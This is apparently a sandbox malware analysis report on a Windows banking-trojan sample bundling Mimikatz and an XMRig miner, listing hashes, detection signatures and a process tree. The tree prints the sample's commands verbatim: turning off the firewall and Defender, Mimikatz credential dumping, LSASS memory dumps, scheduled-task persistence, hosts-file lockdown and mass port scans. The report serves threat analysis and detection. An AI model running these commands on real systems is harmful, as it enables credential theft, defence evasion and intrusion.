Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    06-08-2024 19:22

General

  • Target

    1be70b9e267287d0a959a1f1ca4f544e59b8848a8f814dce902df948d1dc0e40.exe

  • Size

    8.1MB

  • MD5

    8ddd0b8ccd60d78e52b173c40323c7dc

  • SHA1

    a73deed521165c6f269a58a27ac8e2cadaffe96f

  • SHA256

    1be70b9e267287d0a959a1f1ca4f544e59b8848a8f814dce902df948d1dc0e40

  • SHA512

    a37f85bb25c3324dd6cdc4235fe9ad813cd32bb3961291b3f2457921db0ecb49360f67bd86d26ce71b9aa1aafd4508b8dba3db475a810e6461d0480ef16b3c9b

  • SSDEEP

    98304:TRoeO6XTBJYazImknGzZr+HIPFtmOZ9G17xwFB5URUSKnaSOdroSCa:NoeO6XTYxmknGzwHIPHd9swFBubKT

Malware Config

Signatures

  • Blackmoon, KrBanker

    Blackmoon also known as KrBanker is banking trojan first discovered in early 2014.

  • Detect Blackmoon payload 6 IoCs
  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (63902) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 13 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 6 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 44 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 17 IoCs
  • Loads dropped DLL 24 IoCs
  • UPX packed file 31 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Indicator Removal: Clear Persistence 1 TTPs 2 IoCs

    remove IFEO.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 8 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 45 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 31 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:1020
      • C:\Windows\TEMP\ngzetecmk\ktikni.exe
        "C:\Windows\TEMP\ngzetecmk\ktikni.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1292
    • C:\Users\Admin\AppData\Local\Temp\1be70b9e267287d0a959a1f1ca4f544e59b8848a8f814dce902df948d1dc0e40.exe
      "C:\Users\Admin\AppData\Local\Temp\1be70b9e267287d0a959a1f1ca4f544e59b8848a8f814dce902df948d1dc0e40.exe"
      1⤵
      • Drops file in Windows directory
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2024
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\lgrebuee\bzhfhil.exe
        2⤵
        • Loads dropped DLL
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:1652
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2860
        • C:\Windows\lgrebuee\bzhfhil.exe
          C:\Windows\lgrebuee\bzhfhil.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:2768
    • C:\Windows\lgrebuee\bzhfhil.exe
      C:\Windows\lgrebuee\bzhfhil.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Loads dropped DLL
      • Indicator Removal: Clear Persistence
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2908
      • C:\Windows\lgrebuee\kkjdjklygizuerj27118.exe
        C:\Windows\lgrebuee\kkjdjklygizuerj27118.exe
        2⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        PID:2808
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2868
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2688
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2872
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:2776
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2884
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2660
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
            3⤵
              PID:2656
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static delete all
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • Modifies data under HKEY_USERS
            PID:1460
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add policy name=Bastards description=FuckingBastards
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:944
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filteraction name=BastardsList action=block
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            • Modifies data under HKEY_USERS
            PID:1156
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ebzlfzeyg" /ru system /tr "cmd /c C:\Windows\Fonts\bzhfhil.exe"
            2⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1464
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
                PID:2760
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /sc minute /mo 1 /tn "ebzlfzeyg" /ru system /tr "cmd /c C:\Windows\Fonts\bzhfhil.exe"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:1640
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              • Modifies data under HKEY_USERS
              PID:1504
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              • Modifies data under HKEY_USERS
              PID:2648
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:2332
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static set policy name=Bastards assign=y
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              PID:3060
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              • Modifies data under HKEY_USERS
              PID:1980
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              PID:900
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              PID:1344
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static set policy name=Bastards assign=y
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              • Modifies data under HKEY_USERS
              PID:2168
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • Modifies data under HKEY_USERS
              PID:2380
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:692
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              PID:1168
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static set policy name=Bastards assign=y
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              • Modifies data under HKEY_USERS
              PID:1648
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c net stop SharedAccess
              2⤵
                PID:776
                • C:\Windows\SysWOW64\net.exe
                  net stop SharedAccess
                  3⤵
                    PID:328
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop SharedAccess
                      4⤵
                        PID:2252
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c netsh firewall set opmode mode=disable
                    2⤵
                      PID:2608
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh firewall set opmode mode=disable
                        3⤵
                        • Modifies Windows Firewall
                        • Event Triggered Execution: Netsh Helper DLL
                        PID:2072
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c netsh Advfirewall set allprofiles state off
                      2⤵
                        PID:636
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh Advfirewall set allprofiles state off
                          3⤵
                          • Modifies Windows Firewall
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Location Discovery: System Language Discovery
                          • Modifies data under HKEY_USERS
                          PID:1472
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c net stop MpsSvc
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:2272
                        • C:\Windows\SysWOW64\net.exe
                          net stop MpsSvc
                          3⤵
                            PID:1080
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop MpsSvc
                              4⤵
                                PID:2584
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c net stop WinDefend
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:2632
                            • C:\Windows\SysWOW64\net.exe
                              net stop WinDefend
                              3⤵
                                PID:1720
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop WinDefend
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:304
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c net stop wuauserv
                              2⤵
                              • System Location Discovery: System Language Discovery
                              PID:2304
                              • C:\Windows\SysWOW64\net.exe
                                net stop wuauserv
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:404
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop wuauserv
                                  4⤵
                                    PID:1208
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c sc config MpsSvc start= disabled
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:1964
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config MpsSvc start= disabled
                                  3⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:2348
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c sc config SharedAccess start= disabled
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:2176
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config SharedAccess start= disabled
                                  3⤵
                                  • Launches sc.exe
                                  PID:2860
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c sc config WinDefend start= disabled
                                2⤵
                                  PID:1448
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc config WinDefend start= disabled
                                    3⤵
                                    • Launches sc.exe
                                    • System Location Discovery: System Language Discovery
                                    PID:2544
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c sc config wuauserv start= disabled
                                  2⤵
                                    PID:1600
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc config wuauserv start= disabled
                                      3⤵
                                      • Launches sc.exe
                                      • System Location Discovery: System Language Discovery
                                      PID:2576
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c C:\Windows\uinyzgkvy\mmyaykufi\wpcap.exe /S
                                    2⤵
                                    • Loads dropped DLL
                                    PID:2108
                                    • C:\Windows\uinyzgkvy\mmyaykufi\wpcap.exe
                                      C:\Windows\uinyzgkvy\mmyaykufi\wpcap.exe /S
                                      3⤵
                                      • Drops file in Drivers directory
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Drops file in System32 directory
                                      • Drops file in Program Files directory
                                      PID:2864
                                      • C:\Windows\SysWOW64\net.exe
                                        net stop "Boundary Meter"
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2680
                                        • C:\Windows\SysWOW64\net1.exe
                                          C:\Windows\system32\net1 stop "Boundary Meter"
                                          5⤵
                                            PID:2684
                                        • C:\Windows\SysWOW64\net.exe
                                          net stop "TrueSight Meter"
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:2812
                                          • C:\Windows\SysWOW64\net1.exe
                                            C:\Windows\system32\net1 stop "TrueSight Meter"
                                            5⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:1916
                                        • C:\Windows\SysWOW64\net.exe
                                          net stop npf
                                          4⤵
                                            PID:2472
                                            • C:\Windows\SysWOW64\net1.exe
                                              C:\Windows\system32\net1 stop npf
                                              5⤵
                                                PID:1796
                                            • C:\Windows\SysWOW64\net.exe
                                              net start npf
                                              4⤵
                                                PID:1476
                                                • C:\Windows\SysWOW64\net1.exe
                                                  C:\Windows\system32\net1 start npf
                                                  5⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2520
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /c net start npf
                                            2⤵
                                              PID:2568
                                              • C:\Windows\SysWOW64\net.exe
                                                net start npf
                                                3⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:2752
                                                • C:\Windows\SysWOW64\net1.exe
                                                  C:\Windows\system32\net1 start npf
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2232
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /c net start npf
                                              2⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:1504
                                              • C:\Windows\SysWOW64\net.exe
                                                net start npf
                                                3⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:2996
                                                • C:\Windows\SysWOW64\net1.exe
                                                  C:\Windows\system32\net1 start npf
                                                  4⤵
                                                    PID:2960
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c C:\Windows\uinyzgkvy\mmyaykufi\iybtmbhuy.exe -p 80,3389 222.186.55.1-222.186.155.255 --rate=1024 -oJ C:\Windows\uinyzgkvy\mmyaykufi\Scantest.txt
                                                2⤵
                                                • Loads dropped DLL
                                                PID:3048
                                                • C:\Windows\uinyzgkvy\mmyaykufi\iybtmbhuy.exe
                                                  C:\Windows\uinyzgkvy\mmyaykufi\iybtmbhuy.exe -p 80,3389 222.186.55.1-222.186.155.255 --rate=1024 -oJ C:\Windows\uinyzgkvy\mmyaykufi\Scantest.txt
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • System Location Discovery: System Language Discovery
                                                  PID:3024
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c C:\Windows\uinyzgkvy\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\uinyzgkvy\Corporate\log.txt
                                                2⤵
                                                • Loads dropped DLL
                                                • Drops file in Windows directory
                                                PID:2208
                                                • C:\Windows\uinyzgkvy\Corporate\vfshost.exe
                                                  C:\Windows\uinyzgkvy\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:524
                                              • C:\Windows\TEMP\amydesk.exe
                                                C:\Windows\TEMP\amydesk.exe
                                                2⤵
                                                • Executes dropped EXE
                                                • Drops file in System32 directory
                                                • Suspicious use of SetWindowsHookEx
                                                PID:2216
                                              • C:\Windows\TEMP\uinyzgkvy\igteyvken.exe
                                                C:\Windows\TEMP\uinyzgkvy\igteyvken.exe -accepteula -mp 1232 C:\Windows\TEMP\uinyzgkvy\1232.dmp
                                                2⤵
                                                • Executes dropped EXE
                                                • Modifies data under HKEY_USERS
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2328
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd.exe /c C:\Windows\uinyzgkvy\mmyaykufi\scan.bat
                                                2⤵
                                                • Loads dropped DLL
                                                • System Location Discovery: System Language Discovery
                                                PID:2428
                                                • C:\Windows\uinyzgkvy\mmyaykufi\nybnimkby.exe
                                                  nybnimkby.exe TCP 194.110.0.1 194.110.255.255 82 512 /save
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Drops file in Windows directory
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1400
                                              • C:\Windows\TEMP\uinyzgkvy\igteyvken.exe
                                                C:\Windows\TEMP\uinyzgkvy\igteyvken.exe -accepteula -mp 1388 C:\Windows\TEMP\uinyzgkvy\1388.dmp
                                                2⤵
                                                • Executes dropped EXE
                                                • Modifies data under HKEY_USERS
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:3120
                                              • C:\Windows\TEMP\uinyzgkvy\igteyvken.exe
                                                C:\Windows\TEMP\uinyzgkvy\igteyvken.exe -accepteula -mp 2208 C:\Windows\TEMP\uinyzgkvy\2208.dmp
                                                2⤵
                                                • Executes dropped EXE
                                                • Modifies data under HKEY_USERS
                                                PID:3004
                                              • C:\Windows\TEMP\uinyzgkvy\igteyvken.exe
                                                C:\Windows\TEMP\uinyzgkvy\igteyvken.exe -accepteula -mp 2200 C:\Windows\TEMP\uinyzgkvy\2200.dmp
                                                2⤵
                                                • Executes dropped EXE
                                                PID:2812
                                              • C:\Windows\SysWOW64\netsh.exe
                                                netsh ipsec static delete all
                                                2⤵
                                                • Event Triggered Execution: Netsh Helper DLL
                                                • Modifies data under HKEY_USERS
                                                PID:3500
                                              • C:\Windows\SysWOW64\netsh.exe
                                                netsh ipsec static add policy name=Bastards description=FuckingBastards
                                                2⤵
                                                • Event Triggered Execution: Netsh Helper DLL
                                                • System Location Discovery: System Language Discovery
                                                • Modifies data under HKEY_USERS
                                                PID:2640
                                              • C:\Windows\SysWOW64\netsh.exe
                                                netsh ipsec static add filteraction name=BastardsList action=block
                                                2⤵
                                                • Event Triggered Execution: Netsh Helper DLL
                                                • Modifies data under HKEY_USERS
                                                PID:3712
                                              • C:\Windows\SysWOW64\netsh.exe
                                                netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                                                2⤵
                                                • Event Triggered Execution: Netsh Helper DLL
                                                • System Location Discovery: System Language Discovery
                                                PID:2164
                                              • C:\Windows\SysWOW64\netsh.exe
                                                netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                                                2⤵
                                                • Event Triggered Execution: Netsh Helper DLL
                                                • Modifies data under HKEY_USERS
                                                PID:2980
                                              • C:\Windows\SysWOW64\netsh.exe
                                                netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                                                2⤵
                                                  PID:3240
                                                • C:\Windows\SysWOW64\netsh.exe
                                                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                                                  2⤵
                                                  • Event Triggered Execution: Netsh Helper DLL
                                                  • System Location Discovery: System Language Discovery
                                                  • Modifies data under HKEY_USERS
                                                  PID:3332
                                                • C:\Windows\SysWOW64\netsh.exe
                                                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                                                  2⤵
                                                  • Event Triggered Execution: Netsh Helper DLL
                                                  • Modifies data under HKEY_USERS
                                                  PID:2240
                                                • C:\Windows\SysWOW64\netsh.exe
                                                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                                                  2⤵
                                                  • Event Triggered Execution: Netsh Helper DLL
                                                  • System Location Discovery: System Language Discovery
                                                  • Modifies data under HKEY_USERS
                                                  PID:1168
                                                • C:\Windows\SysWOW64\netsh.exe
                                                  netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                  2⤵
                                                    PID:3464
                                                  • C:\Windows\SysWOW64\netsh.exe
                                                    netsh ipsec static set policy name=Bastards assign=y
                                                    2⤵
                                                    • Event Triggered Execution: Netsh Helper DLL
                                                    • System Location Discovery: System Language Discovery
                                                    • Modifies data under HKEY_USERS
                                                    PID:2876
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                    2⤵
                                                      PID:3448
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                        3⤵
                                                          PID:3432
                                                        • C:\Windows\SysWOW64\cacls.exe
                                                          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                                          3⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:3736
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                          3⤵
                                                            PID:2148
                                                          • C:\Windows\SysWOW64\cacls.exe
                                                            cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:1896
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2576
                                                          • C:\Windows\SysWOW64\cacls.exe
                                                            cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                            3⤵
                                                              PID:2028
                                                          • C:\Windows\SysWOW64\netsh.exe
                                                            netsh ipsec static delete all
                                                            2⤵
                                                            • Event Triggered Execution: Netsh Helper DLL
                                                            • Modifies data under HKEY_USERS
                                                            PID:3120
                                                          • C:\Windows\SysWOW64\netsh.exe
                                                            netsh ipsec static add policy name=Bastards description=FuckingBastards
                                                            2⤵
                                                            • Event Triggered Execution: Netsh Helper DLL
                                                            • System Location Discovery: System Language Discovery
                                                            PID:3936
                                                          • C:\Windows\SysWOW64\netsh.exe
                                                            netsh ipsec static add filteraction name=BastardsList action=block
                                                            2⤵
                                                            • Modifies data under HKEY_USERS
                                                            PID:4052
                                                          • C:\Windows\SysWOW64\netsh.exe
                                                            netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                                                            2⤵
                                                            • Event Triggered Execution: Netsh Helper DLL
                                                            • Modifies data under HKEY_USERS
                                                            PID:2576
                                                          • C:\Windows\SysWOW64\netsh.exe
                                                            netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                                                            2⤵
                                                            • Event Triggered Execution: Netsh Helper DLL
                                                            PID:2596
                                                          • C:\Windows\SysWOW64\netsh.exe
                                                            netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                                                            2⤵
                                                            • Event Triggered Execution: Netsh Helper DLL
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2384
                                                          • C:\Windows\SysWOW64\netsh.exe
                                                            netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                                                            2⤵
                                                            • Event Triggered Execution: Netsh Helper DLL
                                                            PID:1208
                                                          • C:\Windows\SysWOW64\netsh.exe
                                                            netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                                                            2⤵
                                                            • Event Triggered Execution: Netsh Helper DLL
                                                            • System Location Discovery: System Language Discovery
                                                            PID:3512
                                                          • C:\Windows\SysWOW64\netsh.exe
                                                            netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                                                            2⤵
                                                            • Event Triggered Execution: Netsh Helper DLL
                                                            • Modifies data under HKEY_USERS
                                                            PID:808
                                                          • C:\Windows\SysWOW64\netsh.exe
                                                            netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                            2⤵
                                                            • Event Triggered Execution: Netsh Helper DLL
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2228
                                                          • C:\Windows\SysWOW64\netsh.exe
                                                            netsh ipsec static set policy name=Bastards assign=y
                                                            2⤵
                                                            • Event Triggered Execution: Netsh Helper DLL
                                                            PID:1640
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                            2⤵
                                                              PID:3300
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:1932
                                                              • C:\Windows\SysWOW64\cacls.exe
                                                                cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2096
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2964
                                                              • C:\Windows\SysWOW64\cacls.exe
                                                                cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                                                3⤵
                                                                  PID:3668
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                  3⤵
                                                                    PID:1880
                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                    3⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:1844
                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  netsh ipsec static delete all
                                                                  2⤵
                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:3692
                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  netsh ipsec static add policy name=Bastards description=FuckingBastards
                                                                  2⤵
                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                  PID:1908
